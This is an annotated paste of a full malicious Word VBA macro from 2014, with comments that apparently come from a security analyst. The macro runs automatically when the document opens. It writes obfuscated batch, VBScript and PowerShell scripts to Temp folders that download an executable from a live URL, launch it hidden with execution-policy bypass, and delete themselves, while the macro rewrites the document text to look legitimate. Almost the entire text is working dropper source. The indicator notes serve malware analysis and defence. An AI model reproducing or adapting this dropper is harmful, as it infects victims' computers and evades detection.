dynamoo

Malicious Word macro

Dec 12th, 2014
  ' Analyst note: exported VBA module header. VB_Name and VB_Base identify this as the
  ' document's ThisDocument code module (based on Normal.ThisDocument), so the code below
  ' is stored in the Word document itself.
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  ' Auto_Open: common entry point of the macro chain. It only calls h, which does all the
  ' work. The AutoOpen and Workbook_Open stubs further down in this module forward here.
  9. Sub Auto_Open()
  10.     h
  11. End Sub
  ' h: dropper body, reached from Auto_Open. It builds file paths under the current user's
  ' Temp directory and under c:\Windows\Temp, deletes earlier copies, reads the Windows
  ' version through WMI, then writes and launches a script chain that downloads an
  ' executable and runs it as 444.exe. At the end it edits the document text (findTest,
  ' secondTest and the Find/Replace loops).
  '
  ' String literals are split and mixed with Chr()/Asc() calls, so names such as
  ' "cscript.exe", "powershell.exe" and the URL never appear whole in the macro source.
  ' The inline notes give the decoded values. Assignments of random-looking strings
  ' (ASDSA, ASJDKHSJADASDSA) appear to be filler; nothing in this listing reads them.
  '
  ' Indicators visible in this routine (defanged in these comments only):
  '   files  : adobeacd-update.ps1 / .bat / .vbs and 444.exe in c:\Users\<username>\AppData\Local\Temp
  '            adobeacd-updatexp.vbs, adobeacd-update.bat and 444.exe in c:\Windows\Temp
  '   network: hxxp://www.2fs[.]com[.]au/tmp/rkn.exe, with a hard-coded Safari/Mac User-Agent
  '            on the PowerShell path
  '   process: the Office host starting a .bat via Shell, which starts cscript.exe; on newer
  '            Windows cscript starts powershell.exe with "-ExecutionPolicy bypass -noprofile"
  12. Sub h()
  13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
      ' Current user name, used to build the per-user Temp paths below.
  14.      USER = Environ("username")
  15.      
      ' Dropped file names, decoded: PST1 = "adobeacd-update.ps1", BART = "adobeacd-update.bat",
      ' VBT1 = "adobeacd-update.vbs", VBTXP = "adobeacd-updatexp.vbs".
  16.      PST1 = "adobeacd-update." + "p" + Chr(115) + "1"
  17.      BART = "adobeacd-update.b" + Chr(Asc(Chr(Asc("a")))) + Chr(Asc("t"))
  18.      ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
  19.      VBT1 = "adobeacd-update." + Chr(118) + "bs"
  20.      VBTXP = "adobeacd-updatexp." + "v" + Chr(Asc("b")) + "s"
  21.      
  22.      
      ' Full paths: MY_FILENDIR = .ps1, MY_FILEDIR = .bat, MY_FILDIR = .vbs (all in the user's
      ' Temp directory); XPFILEDIR = .vbs and XPBARTFILEDIR = .bat in c:\Windows\Temp.
  23.      MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
  24.      ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
  25.      MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
  26.      MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
  27.      XPFILEDIR = "c:\Windows\Temp\" + VBTXP
  28.      XPBARTFILEDIR = "c:\Windows\Temp\" + BART
  29.      
      ' Reset attributes and delete leftovers from an earlier run. On Error Resume Next stays
      ' in effect for the rest of the routine, so every later failure is silently ignored.
  30.       On Error Resume Next
  31.      SetAttr MY_FILENDIR, vbNormal
  32.      
  33.      If (Len(Dir(MY_FILENDIR)) <> 0) Then
  34.       Kill MY_FILENDIR
  35.      End If
  36.      
  37.      On Error Resume Next
  38.      SetAttr MY_FILEDIR, vbNormal
  39.      If (Dir(MY_FILEDIR) <> "") Then
  40.       Kill MY_FILEDIR
  41.      End If
  42.      
  43.      On Error Resume Next
  44.      SetAttr MY_FILDIR, vbNormal
  45.      If (Dir(MY_FILDIR) <> "") Then
  46.       Kill MY_FILDIR
  47.      End If
  48.      
  49.      On Error Resume Next
  50.      SetAttr XPFILEDIR, vbNormal
  51.      If (Dir(XPFILEDIR) <> "") Then
  52.       Kill XPFILEDIR
  53.      End If
  54.      
  55.      Dim FileNumber As Integer
  56.      Dim FileNumb As Integer
  57.      Dim FileNu As Integer
  58.      Dim mttt As Integer
  59.      Dim retVal As Variant
  60.      'Dim winver As Integer
      ' NOTE(review): FreeFile is called three times before any file is opened, so the three
      ' handles presumably hold the same number; the files below are opened and closed one at
      ' a time.
  61.     FileNumber = FreeFile
  62.      FileNumb = FreeFile
  63.      FileNu = FreeFile
  64.      
  65.      Dim objWMIService As Variant
  66.     Dim colOperatingSystems As Variant
  67.     Dim objOperatingSystem As Variant
      ' WMI query for the operating system. SysReport is assembled here but is not used
      ' anywhere else in this listing.
  68.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  69.     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  70.     For Each objOperatingSystem In colOperatingSystems
  71.         SysReport = SysReport & "The operating system on this computer is " & _
  72.             objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
  73.     Next
  74.      
      ' Same query again, this time keeping only the version string.
  75.      Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  76.      Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  77.      For Each objOperatingSystem In colOperatingSystems
  78.         winverstr = objOperatingSystem.Version
  79.     Next
  80.    
  81.    
      ' Val() keeps the leading "major.minor" part of the version string (e.g. "6.1.7601" -> 6.1);
      ' the result selects one of the two branches below.
  82.     winver = Val(winverstr)
  83.     WaitFor (1)
  84.      
      ' Branch 1: version <= 5.5 (the XP-era path, going by the XP* variable names).
      ' All files are written to c:\Windows\Temp.
  85. If (winver <= 5.5) Then
      ' Batch file written to XPBARTFILEDIR. It runs adobeacd-updatexp.vbs with cscript.exe,
      ' runs c:\Windows\Temp\444.exe, then loops deleting the VBS and the batch file itself
      ' until both are gone. The "ping 1.1.2.2" lines appear to serve as delays.
  86.      Open XPBARTFILEDIR For Output As #FileNu
  87.      Print #FileNu, "@echo off"
  88.      Print #FileNu, "ping 1.1.2.2 -n 2"
  89.      Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
  90.      Print #FileNu, "ping 1.1.2.2 -n 2"
  91.      Print #FileNu, "c:\Windows\Temp\444.exe"
  92.      Print #FileNu, ":loop"
  93.      Print #FileNu, "ping 1.1.2.2 -n 1"
  94.      Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  95.      Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
  96.      Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
  97.      Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
  98.      Print #FileNu, "exit"
  99.      Close #FileNu
  100.      WaitFor (2)
      ' mttt = 88 is the base for the Chr() arithmetic below: Chr(88)="X", Chr(77)="M",
      ' Chr(76)="L", Chr(34)=double quote, which spells "MSXML2.XMLHTTP".
  101.      mttt = 88
  102.  
      ' VBS downloader written to XPFILEDIR. It requests strRT (the rkn.exe URL) with
      ' MSXML2.XMLHTTP and, on HTTP status 200, saves the response body to strTecation
      ' (c:\Windows\Temp\444.exe) through ADODB.Stream. The WScript.Shell object created on
      ' its last line is not used by the script; execution is left to the batch file.
  103.      Open XPFILEDIR For Output As #FileNumber
  104.      Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.2fs.com.au/tmp/rkn" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  105.      Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  106.      
  107.      Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
  108.      'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
  109.    
  110.      Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
  111.      
  112.      Print #FileNumber, "objXMLHTTP.send() "
  113.      Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
  114.      
  115.      Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
  116.      
  117.      Print #FileNumber, "objADOStream.Open "
  118.      Print #FileNumber, "objADOStream.Type = 1"
  119.      Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
  120.      Print #FileNumber, "objADOStream.Position = 0 "
  121.      Print #FileNumber, "objADOStream.SaveToFile strTecation "
  122.      Print #FileNumber, "objADOStream.Close "
  123.      Print #FileNumber, "Set objADOStream = Nothing "
  124.      Print #FileNumber, "End if "
  125.      Print #FileNumber, "Set objXMLHTTP = Nothing"
  126.      Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
  127.      Close #FileNumber
  128.      
  129.      WaitFor (1)
  130.      
      ' Launch the batch file; window style 0 keeps its window hidden.
  131.      retVal = Shell(XPBARTFILEDIR, 0)
  132.      
  133.      
  134. End If
  135.      
  136.      
      ' Branch 2: version > 5.5. Files go to c:\Users\<username>\AppData\Local\Temp and the
      ' chain is .bat -> cscript .vbs -> powershell .ps1.
  137. If (winver > 5.5) Then
      ' PowerShell script written to MY_FILENDIR. Decoded, it creates a System.Net.WebClient,
      ' sets a fixed Safari-on-Mac User-Agent, downloads the rkn.exe URL to 444.exe in the
      ' user's Temp directory, sleeps 15 seconds and runs 444.exe through cmd.exe /c. It then
      ' toggles the Hidden attribute on the .vbs/.bat/.ps1 files (-bxor), removes the .vbs,
      ' the .bat and 444.exe if present, and calls Remove-Item on its own invocation name.
  138.      Open MY_FILENDIR For Output As #FileNumber
  139.      Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  140.      Print #FileNumber, "$url  = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://www.2fs.com.au/tmp/rk" & "n.e" & "x" + "e';"
  141.      Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
  142.      Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
  143.      Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
  144.      Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  145.      Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  146.      Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
  147.      Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
  148.      Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
  149.      Print #FileNumber, "Start-Sleep -s 15;"
  150.      Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
  151.      Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  152.      Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
  153.      Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  154.      Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  155.      Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  156.      Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
  157.      Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  158.      Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  159.      Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  160.      Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  161.      Close #FileNumber
  162.    
      ' VBS launcher written to MY_FILDIR. Decoded, its last line is:
      '   objShell.Run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true
      ' where currentFile is the .ps1 path. Window style 0 hides the window and "true" waits
      ' for PowerShell to finish.
  163.     Open MY_FILDIR For Output As #FileNumb
  164.     Print #FileNumb, "Dim dff"
  165.     Print #FileNumb, "dff = 68"
  166.     Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
  167.     Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
  168.     Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
  169.     Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
  170.     Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
  171.     Close #FileNumb
  172.    
      ' Batch file written to MY_FILEDIR: a ping delay, "chcp 1251" (switches the console to
      ' the Windows-1251 code page), then cscript.exe on the .vbs launcher.
  173.     Open MY_FILEDIR For Output As #FileNu
  174.     Print #FileNu, "@echo off"
  175.     Print #FileNu, "ping 1.1.2.2 -n 2"
  176.     Print #FileNu, "chcp 1251"
  177.     Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
  178.     Print #FileNu, "exit"
  179.     Close #FileNu
  180.        
  181.     SetAttr MY_FILENDIR, vbNormal
  182.     SetAttr MY_FILEDIR, vbNormal
  183.     SetAttr MY_FILDIR, vbNormal
  184.      
  185.     WaitFor (1)
  186.    
      ' Launch the batch file; window style 0 keeps its window hidden.
  187.     retVal = Shell(MY_FILEDIR, 0)
  188. End If
  189.      
      ' Document edits after the drop: findTest deletes the text between the <select> markers,
      ' secondTest turns the text between the <inbox> markers black, and the four loops below
      ' replace the marker tags themselves ("<select>", "</select>", "<inbox>", "</inbox>")
      ' with a space in every story range.
  190.      findTest
  191.     secondTest
  192.     For Each myStoryRange In ActiveDocument.StoryRanges
  193.     With myStoryRange.Find
  194.         .Text = "<" & "sel" & "ect>"
  195.         .Replacement.Text = " "
  196.         .Wrap = wdFindContinue
  197.         .Execute Replace:=wdReplaceAll
  198.     End With
  199.     Next myStoryRange
  200.  
  201.     For Each myStoryRange In ActiveDocument.StoryRanges
  202.     With myStoryRange.Find
  203.         .Text = "</s" & "ele" & "ct>"
  204.         .Replacement.Text = " "
  205.         .Wrap = wdFindContinue
  206.         .Execute Replace:=wdReplaceAll
  207.     End With
  208.     Next myStoryRange
  209.    
  210.     For Each myStoryRange In ActiveDocument.StoryRanges
  211.     With myStoryRange.Find
  212.         .Text = "<" & "in" & "box>"
  213.         .Replacement.Text = " "
  214.         .Wrap = wdFindContinue
  215.         .Execute Replace:=wdReplaceAll
  216.     End With
  217.     Next myStoryRange
  218.  
  219.     For Each myStoryRange In ActiveDocument.StoryRanges
  220.     With myStoryRange.Find
  221.         .Text = "</" & "in" & "box>"
  222.         .Replacement.Text = " "
  223.         .Wrap = wdFindContinue
  224.         .Execute Replace:=wdReplaceAll
  225.     End With
  226.     Next myStoryRange
  227.      
  228.  
  229. End Sub
  ' WaitFor: pauses for about NumOfSeconds seconds by polling Timer in a loop, calling
  ' DoEvents on each pass so the host application keeps processing events. h uses it
  ' between writing the dropped files and launching them.
  ' NOTE(review): Timer returns seconds since midnight as a Single. Storing the deadline
  ' in a Long rounds it, and a wait that spans midnight would end early because Timer resets.
  230. Sub WaitFor(NumOfSeconds As Long)
  231. Dim SngSec As Long
  232. SngSec = Timer + NumOfSeconds
  233.  
  234. Do While Timer < SngSec
  235. DoEvents
  236. Loop
  237.  
  238. End Sub
  239.  
  ' AutoOpen is the macro name Word runs automatically when a document is opened with
  ' macros enabled; here it forwards to Auto_Open, which calls h.
  240. Sub AutoOpen()
  241.     Auto_Open
  242. End Sub
  ' Workbook_Open is the name of Excel's workbook-open event handler; it also forwards to
  ' Auto_Open.
  ' NOTE(review): the module attributes mark this as a Word ThisDocument module, so this
  ' stub is presumably carried over from a template shared with Excel lures. Confirm.
  243. Sub Workbook_Open()
  244.     Auto_Open
  245. End Sub
  ' findTest: searches the document for the "<select>" marker, then for the following
  ' "</select>" marker, and deletes the text between the two. It is called from h after
  ' the dropped scripts have been launched. The tags themselves are stripped by the
  ' Find/Replace loops at the end of h.
  ' The ASK* string assignments are never read in this listing and appear to be filler.
  246. Sub findTest()
  247. Dim firstTerm As String
  248. Dim secondTerm As String
  249. Dim rrtt As Range
  250. Dim selRange As Range
  251. Dim selectedText As String
  252.  
  253. Set rrtt = ActiveDocument.Range
  254. firstTerm = "<se" & "lect>"
  255. secondTerm = "</sel" & "ect>"
  256. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
  257. With rrtt.Find
  258. .Text = firstTerm
  259. .MatchWholeWord = True
  260. .Execute
  261. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
      ' Collapse to the end of the opening tag; selRange starts there.
  262. rrtt.Collapse direction:=wdCollapseEnd
  263. Set selRange = ActiveDocument.Range
  264. selRange.Start = rrtt.End
  265. .Text = secondTerm
  266. .MatchWholeWord = True
  267. .Execute
  268. ASKSASADW = "asjldklas"
      ' Collapse to the start of the closing tag; selRange ends there and is then deleted.
      ' The value returned by Delete is stored in selectedText but never read.
  269. rrtt.Collapse direction:=wdCollapseStart
  270. selRange.End = rrtt.Start
  271. selectedText = selRange.Delete
  272. End With
  273. End Sub
  274.  
  ' secondTest: searches the document for the "<inbox>" marker, then for the following
  ' "</inbox>" marker, and sets the font colour of the text between them to black. It is
  ' called from h right after findTest.
  ' NOTE(review): presumably that text is formatted so it cannot be read until the macro
  ' runs, making the document look "unlocked" afterwards. Confirm against the lure document.
  ' myRanget is declared but unused. The ASK*/ASA* string assignments are never read in
  ' this listing and appear to be filler.
  275. Sub secondTest()
  276. Dim firstTerm As String
  277. Dim secondTerm As String
  278. Dim myRanget As Range
  279. Dim yytt As Range
  280. Dim selRanget As Range
  281. Dim selectedTextt As String
  282.  
  283. Set yytt = ActiveDocument.Range
  284. firstTerm = "<in" & "box>"
  285. secondTerm = "</in" & "box>"
  286. ASKIEJSASAHBDJ = "ask as8d j asdasl;a skdjasdnkjh12kh1 sad"
  287. With yytt.Find
  288. .Text = firstTerm
  289. .MatchWholeWord = True
  290. .Execute
  291. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
      ' Collapse to the end of the opening tag; selRanget starts there.
  292. yytt.Collapse direction:=wdCollapseEnd
  293. ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a skdjasdnkjh12kh1 sad"
  294. Set selRanget = ActiveDocument.Range
  295. selRanget.Start = yytt.End
  296. .Text = secondTerm
  297. .MatchWholeWord = True
  298. .Execute
  299. ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a skdjasdnkjh12kh1 sad"
      ' Collapse to the start of the closing tag; selRanget ends there and is recoloured.
  300. yytt.Collapse direction:=wdCollapseStart
  301. selRanget.End = yytt.Start
  302. selectedTextt = selRanget
  303. selRanget.Font.Color = wdColorBlack
  304. End With
  305. End Sub